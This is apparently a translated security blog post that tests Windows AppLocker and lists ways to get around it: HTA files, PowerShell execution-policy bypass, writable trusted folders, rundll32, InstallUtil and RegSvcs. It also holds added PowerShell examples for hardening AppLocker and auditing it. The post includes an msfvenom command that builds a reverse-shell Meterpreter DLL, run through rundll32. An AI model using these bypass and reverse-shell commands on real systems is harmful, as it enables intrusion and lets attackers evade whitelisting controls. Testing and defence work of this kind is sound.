3gstudent · 2016/01/18 10:31

0x00 Preface


Last time we tested McAfee Application Control; this time we test Windows AppLocker, another application whitelisting tool, and share the attack and defense techniques we found.

0x01 Overview


Windows AppLocker (Application Control Policies) controls which executables, installers and scripts may run. It originally supported only Windows 7 Enterprise, Windows 7 Ultimate and Windows Server 2008 R2; on October 18, 2012 Microsoft extended it to Windows 8.1, Windows Server 2012 R2, Windows Server 2012 and Windows 8 Enterprise.

As shown in the figure.

AppLocker can create rules for the following file formats to restrict their execution:

Let's actually test the functionality.

0x02 Configuration


Test environment:

    OS: Windows 7 Ultimate x86

1. Enable the service

In Computer Management, go to Services - Application Identity and start the service.

As shown in the figure.

2. Go to the AppLocker configuration page

Run secpol.msc and go to Local Security Policy - Application Control Policies - AppLocker,

or gpedit.msc - Computer Configuration - Windows Settings - Security Settings - Application Control Policies - AppLocker.

As shown in the figure.

3. Configure rules

Set default rules for executables:

  • Allow members of the local administrator group to run all applications.
  • Allow members of the Everyone group to run applications located in Windows folders.
  • Allow members of the Everyone group to run applications located in the Program Files folder.

As shown in the figure.

Set the default rules for the script:

  • Allow members of the local administrator group to run all scripts.
  • Allow members of the Everyone group to run scripts located in the Program Files folder.
  • Allow members of the Everyone group to run scripts located in Windows folders.

As shown in the figure.

Once the default rules are enabled, programs and scripts can only be executed from the default paths.
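The same three steps (service, policy, default rules) can be scripted instead of clicked through in secpol.msc, which also makes it possible to dry-run the policy against sample files before it is enforced. The following PowerShell is an added example written for this post, not code from the original article: it builds the six default rules listed above as an AppLocker policy XML, starts the Application Identity service, tests one file inside and two files outside the trusted paths with Test-AppLockerPolicy, and only then applies the policy. The file names under %TEMP% and the function names are this example's own.

```powershell
# Added example, not code from the original post: script the three configuration
# steps above (service, policy, default rules) and dry-run the policy first.
# Assumptions: elevated PowerShell on Windows 7 / Server 2008 R2 or later with the
# AppLocker module; $PolicyPath and the two test files are made up for this example.

Import-Module AppLocker

$Everyone = 'S-1-1-0'       # well-known SID: Everyone
$Admins   = 'S-1-5-32-544'  # well-known SID: BUILTIN\Administrators

# The six default rules listed above, one hashtable each.
$DefaultRules = @(
    @{ Collection = 'Exe';    Sid = $Admins;   Path = '*';                Name = '(Default Rule) All files' },
    @{ Collection = 'Exe';    Sid = $Everyone; Path = '%WINDIR%\*';       Name = '(Default Rule) All files located in the Windows folder' },
    @{ Collection = 'Exe';    Sid = $Everyone; Path = '%PROGRAMFILES%\*'; Name = '(Default Rule) All files located in the Program Files folder' },
    @{ Collection = 'Script'; Sid = $Admins;   Path = '*';                Name = '(Default Rule) All scripts' },
    @{ Collection = 'Script'; Sid = $Everyone; Path = '%PROGRAMFILES%\*'; Name = '(Default Rule) All scripts located in the Program Files folder' },
    @{ Collection = 'Script'; Sid = $Everyone; Path = '%WINDIR%\*';       Name = '(Default Rule) All scripts located in the Windows folder' }
)

function New-FilePathRuleXml {
    param($Rule)
    @(
        ('    <FilePathRule Id="{0}" Name="{1}" Description="" UserOrGroupSid="{2}" Action="Allow">' -f [guid]::NewGuid(), $Rule.Name, $Rule.Sid),
        '      <Conditions>',
        ('        <FilePathCondition Path="{0}" />' -f $Rule.Path),
        '      </Conditions>',
        '    </FilePathRule>'
    ) -join "`n"
}

function New-DefaultAppLockerPolicyXml {
    # 'AuditOnly' logs decisions without blocking; switch to 'Enabled' once the log looks right.
    param([string]$EnforcementMode = 'Enabled')
    $collections = foreach ($type in 'Exe', 'Script') {
        $rules = @($DefaultRules | Where-Object { $_.Collection -eq $type } | ForEach-Object { New-FilePathRuleXml $_ })
        # '+' concatenates the arrays flat; a comma list would nest $rules and break -join.
        (@(('  <RuleCollection Type="{0}" EnforcementMode="{1}">' -f $type, $EnforcementMode)) + $rules + @('  </RuleCollection>')) -join "`n"
    }
    (@('<AppLockerPolicy Version="1">') + @($collections) + @('</AppLockerPolicy>')) -join "`n"
}

# Step 1: without the Application Identity service, rules are never evaluated.
Set-Service -Name AppIDSvc -StartupType Automatic
Start-Service -Name AppIDSvc

# Steps 2-3: write the policy, then dry-run it against files inside and outside the trusted paths.
$PolicyPath = Join-Path $env:TEMP 'applocker-default.xml'
New-DefaultAppLockerPolicyXml -EnforcementMode 'Enabled' | Set-Content -Path $PolicyPath -Encoding UTF8

$OutsideExe    = Join-Path $env:TEMP 'calc-copy.exe'   # constructed test files
$OutsideScript = Join-Path $env:TEMP 'hello.js'
Copy-Item -Path "$env:windir\System32\calc.exe" -Destination $OutsideExe -Force
Set-Content -Path $OutsideScript -Value 'WScript.Echo("hello");'

# Expected: calc.exe in %WINDIR% -> Allowed; the two copies in %TEMP% -> DeniedByDefault.
Test-AppLockerPolicy -XmlPolicy $PolicyPath -User $Everyone -Path "$env:windir\System32\calc.exe", $OutsideExe, $OutsideScript |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# Apply it. This replaces the local AppLocker policy; add -Merge to keep existing rules.
Set-AppLockerPolicy -XmlPolicy $PolicyPath
```

Running the policy through Test-AppLockerPolicy before Set-AppLockerPolicy is the cheap way to confirm what the screenshots in the next section show by hand; starting with -EnforcementMode 'AuditOnly' gives the same information from the AppLocker event log on a live machine without blocking anything.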

0x03 Test


1. Run an exe

2. Execute a script

0x04 Security Mechanism Analysis


The test shows that the configured rules take effect and block the execution of exes and scripts outside the trusted paths. However, the following are not restricted:

  1. Code running in memory
  2. Office macros
  3. HTML Applications (HTA files)
  4. PowerShell

The bypass techniques we had already mastered are:

  1. Use HTA files
  2. Use JScript
  3. Use PowerShell
  4. Use InstallUtil
  5. Use regsvcs

Beyond these, we eventually found the following methods to work 🙂

0x05 Bypass Methods


1. HTA

Works.

Reference: drops.wooyun.org/tips/10667

Can be used to execute VBS and JavaScript scripts.

2. Privileges

Administrators can execute exe files and scripts without any AppLocker restriction.

3. PowerShell

(1) A PS script can be executed with:

    PowerShell.exe -ExecutionPolicy Bypass -File

(2) A PS script can also be executed this way:

    Get-Content script.txt | iex

(3) Shortcuts can be used to launch PowerShell

Works.

Reference: drops.wooyun.org/tips/10667

4. Process injection

Now that PowerShell scripts can be executed, a reverse Meterpreter session can be obtained.

Then try process injection.

Reference: drops.wooyun.org/tips/11305

If injected into a process with normal privileges, exes and scripts still cannot be executed.

If injected into a process with SYSTEM privileges, exes and scripts can be executed.

5. Find usable file paths

Scan for writable paths with a PS script.

Download: go.mssec.se/AppLockerBC

(If that link is unavailable, I have uploaded the script to GitHub.)

The test is shown in the figure.

After the command runs, usable paths are scanned automatically.

For example, take the path C:\Windows\Tasks.

Running calc.js normally is intercepted.

But after copy calc.js C:\Windows\Tasks,

running C:\Windows\Tasks\calc.js bypasses the interception.

As shown in the figure.
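The weakness here is not AppLocker itself but the ACLs under the paths the default rules trust: any directory below %WINDIR% or %PROGRAMFILES% that non-administrators can write to turns a path rule into an allow-anything rule. The following PowerShell is an added audit example written for this post, not code from the original article or from the AppLockerBC script it links: it walks both trusted roots, reads each directory's ACL, and reports those where a non-admin principal holds an Allow ACE with the CreateFiles or CreateDirectories bit that is not cancelled by a Deny ACE. The principal list and the function names are this example's own choices.

```powershell
# Added example, not code from the original post or the AppLockerBC script:
# list directories under the trusted paths (%WINDIR%, %PROGRAMFILES%) whose ACL
# lets non-administrative principals create files. Each hit (C:\Windows\Tasks in
# the test above) needs a Deny rule or an ACL fix. Assumptions: runs as any user;
# the principal list below is the usual non-admin set and can be extended.

# CreateFiles (= WriteData) and CreateDirectories (= AppendData) are the bits that matter.
$CreateBits = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
              [int][System.Security.AccessControl.FileSystemRights]::CreateDirectories

function Test-NonAdminWritable {
    param(
        [string]$Directory,
        [string[]]$Principals = @('Everyone', 'BUILTIN\Users',
                                  'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    )
    try { $acl = Get-Acl -Path $Directory -ErrorAction Stop } catch { return $false }

    $allow = $false; $deny = $false
    foreach ($ace in $acl.Access) {
        if ($Principals -notcontains $ace.IdentityReference.Value) { continue }
        # InheritOnly ACEs apply to children, not to this directory itself.
        if (($ace.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) -ne 0) { continue }
        # Cast to int so ACEs that still carry generic rights do not break the bit test
        # (generic rights are not expanded here, so the check is conservative).
        if (([int]$ace.FileSystemRights -band $CreateBits) -eq 0) { continue }
        if ($ace.AccessControlType -eq [System.Security.AccessControl.AccessControlType]::Allow) { $allow = $true } else { $deny = $true }
    }
    return ($allow -and -not $deny)   # an explicit Deny wins over Allow
}

function Find-NonAdminWritableDirs {
    param([string[]]$Roots = @($env:windir, $env:ProgramFiles))
    foreach ($root in $Roots) {
        # Get-ChildItem -Directory needs PowerShell 3.0; PSIsContainer also works on Windows 7's 2.0.
        $dirs = @(Get-Item -Path $root) +
                @(Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue | Where-Object { $_.PSIsContainer })
        foreach ($d in $dirs) {
            if (Test-NonAdminWritable -Directory $d.FullName) { $d.FullName }
        }
    }
}

# Walking %WINDIR% takes a few minutes; the output is the list to turn into Deny rules.
$Writable = @(Find-NonAdminWritableDirs)
$Writable
'{0} non-admin-writable directories under trusted paths' -f $Writable.Count
if ($Writable -contains (Join-Path $env:windir 'Tasks')) { 'C:\Windows\Tasks is writable, as in the test above' }
```

Reading ACLs rather than trying to create a file in each directory keeps the audit read-only, so it can be scheduled on production hosts; the list it returns is exactly the input for defense item 1 (tighten the ACL) or for Deny path rules in the policy.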

6. rundll32

(1) Execute JavaScript

A. Get a reverse HTTP shell

Reference: drops.wooyun.org/tips/11764

But this cannot bypass the interception of exe and script execution.

B. Use JavaScript to run a PowerShell command to get an HTTP shell

(2) Load a third-party DLL

A. Your own DLL

Reference: blog.didierstevens.com/2010/02/04/…

Write and build a DLL following that format, then upload it

and execute:

    rundll32.exe cmd.dll,Control_RunDLL

A cmd window pops up.

As shown in the figure.

B. Reverse Meterpreter

On Kali:

    msfvenom -p windows/meterpreter/reverse_http -f dll LHOST=192.168.174.133 LPORT=8080 > ./a.dll

Generate a.dll and upload it to the test host,

then execute:

    rundll32.exe a.dll,Control_RunDLL

The Meterpreter session comes back.

As shown in the figure.

7. Use InstallUtil

Using InstallUtil.exe to execute shellcode works.

With a Microsoft .NET Framework 4.0 environment, it can also be used to run an exe.

References: drops.wooyun.org/tips/8701, drops.wooyun.org/tips/8862

8. Use RegSvcs

Works.

Reference: drops.wooyun.org/tips/10667

0x06 Defense


  1. Strictly control file write permissions
  2. Disable mshta.exe to prevent HTAs from running
  3. Disable PowerShell
  4. Prevent privilege escalation
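Items 1 to 3 map directly onto AppLocker Deny rules, and AppLocker's own event log shows whether they are doing anything. The following PowerShell is an added example written for this post, not code from the original article: it creates Deny path rules for the interpreters the post uses (mshta.exe, powershell.exe), for the two .NET utilities named in the summary (InstallUtil.exe, RegSvcs.exe), and for the writable trusted-path directory found in section 5, merges them into the local policy with Set-AppLockerPolicy -Merge, and then reads the AppLocker event logs for blocked or audit-only-would-block executions. $ExtraDenyDirs, $TargetSid and the function names are this example's own; the directory list is meant to come from your own writable-path audit.

```powershell
# Added example, not code from the original post: express defense items 1-3 as
# AppLocker Deny path rules, merge them into the local policy, and pull the
# AppLocker event logs to see what was blocked (or would have been, in audit mode).
# Assumptions: elevated PowerShell with the AppLocker module; $ExtraDenyDirs holds
# directories found by your own audit, here the C:\Windows\Tasks case from section 5.

Import-Module AppLocker

# Deny for Everyone (S-1-1-0) also binds administrators, since Deny beats Allow;
# use 'S-1-5-32-545' (BUILTIN\Users) instead to leave admins unaffected.
$TargetSid = 'S-1-1-0'

# Items 2 and 3: the interpreters behind the HTA and PowerShell bypasses, plus the two
# .NET utilities named in the summary. rundll32.exe is left alone because Windows itself
# depends on it. '*' in an AppLocker path matches any characters including backslashes,
# so both Framework and Framework64 are covered by one rule.
$DenyExes = @(
    '%SYSTEM32%\mshta.exe',                             '%WINDIR%\SysWOW64\mshta.exe',
    '%SYSTEM32%\WindowsPowerShell\v1.0\powershell.exe', '%WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe',
    '%WINDIR%\Microsoft.NET\*\InstallUtil.exe',
    '%WINDIR%\Microsoft.NET\*\RegSvcs.exe'
)
# Item 1: trusted-path directories that non-admins can write to (from the audit).
$ExtraDenyDirs = @('%WINDIR%\Tasks\*')

function New-DenyPathRuleXml {
    param([string]$Path, [string]$Sid)
    @(
        ('    <FilePathRule Id="{0}" Name="Deny {1}" Description="" UserOrGroupSid="{2}" Action="Deny">' -f [guid]::NewGuid(), $Path, $Sid),
        '      <Conditions>',
        ('        <FilePathCondition Path="{0}" />' -f $Path),
        '      </Conditions>',
        '    </FilePathRule>'
    ) -join "`n"
}

function New-DenyPolicyXml {
    param([string]$EnforcementMode = 'Enabled')   # 'AuditOnly' to observe before blocking
    $exeRules    = @(($DenyExes + $ExtraDenyDirs) | ForEach-Object { New-DenyPathRuleXml -Path $_ -Sid $TargetSid })
    $scriptRules = @($ExtraDenyDirs | ForEach-Object { New-DenyPathRuleXml -Path $_ -Sid $TargetSid })
    $lines = @('<AppLockerPolicy Version="1">') +
             @(('  <RuleCollection Type="Exe" EnforcementMode="{0}">' -f $EnforcementMode)) + $exeRules + @('  </RuleCollection>') +
             @(('  <RuleCollection Type="Script" EnforcementMode="{0}">' -f $EnforcementMode)) + $scriptRules + @('  </RuleCollection>') +
             @('</AppLockerPolicy>')
    $lines -join "`n"
}

function Get-AppLockerBlockedEvents {
    param([int]$Days = 7)
    $since = (Get-Date).AddDays(-$Days)
    # 8004 = exe/dll blocked, 8007 = script/MSI blocked; 8003 and 8006 are the audit-only
    # "would have been blocked" equivalents.
    $filters = @(
        @{ LogName = 'Microsoft-Windows-AppLocker/EXE and DLL';    Id = 8003, 8004; StartTime = $since },
        @{ LogName = 'Microsoft-Windows-AppLocker/MSI and Script'; Id = 8006, 8007; StartTime = $since }
    )
    foreach ($f in $filters) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue |
            Select-Object TimeCreated, Id, @{ n = 'User'; e = { $_.UserId } }, Message
    }
}

$PolicyPath = Join-Path $env:TEMP 'applocker-deny.xml'
New-DenyPolicyXml -EnforcementMode 'Enabled' | Set-Content -Path $PolicyPath -Encoding UTF8
Set-AppLockerPolicy -XmlPolicy $PolicyPath -Merge   # -Merge keeps the existing Allow rules

Get-AppLockerBlockedEvents -Days 7 | Format-Table TimeCreated, Id, User, Message -Wrap
```

Path-based Deny rules are the simplest match for the list above, but a copy of mshta.exe or powershell.exe placed elsewhere is not covered by them; publisher rules built from Get-AppLockerFileInformation follow the signed binary wherever it sits and are the sturdier choice once the path rules have been validated in AuditOnly mode. The event query is the feedback loop for item 4 as well: blocked attempts from an account that should not be launching these tools are the signal to look for.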

0x07 Summary


As the research progressed, it became clear that InstallUtil and RegSvcs are excellent ways to bypass the whitelist restriction, and deserve attention from both the attack and the defense side.

Techniques using rundll32.exe are gradually being discovered.

0x08 References:


  • technet.microsoft.com/en-us/libra…
  • technet.microsoft.com/en-us/libra…
  • dfir-blog.com/2016/01/03/…
  • mssec.wordpress.com/2015/10/22/…
  • www.attackdebris.com/?p=143
  • blog.didierstevens.com/2010/02/04/…

Download:

github.com/3gstudent/B…

This article was originally written by 3gstudent and first published on Cloud Drops (drops.wooyun.org).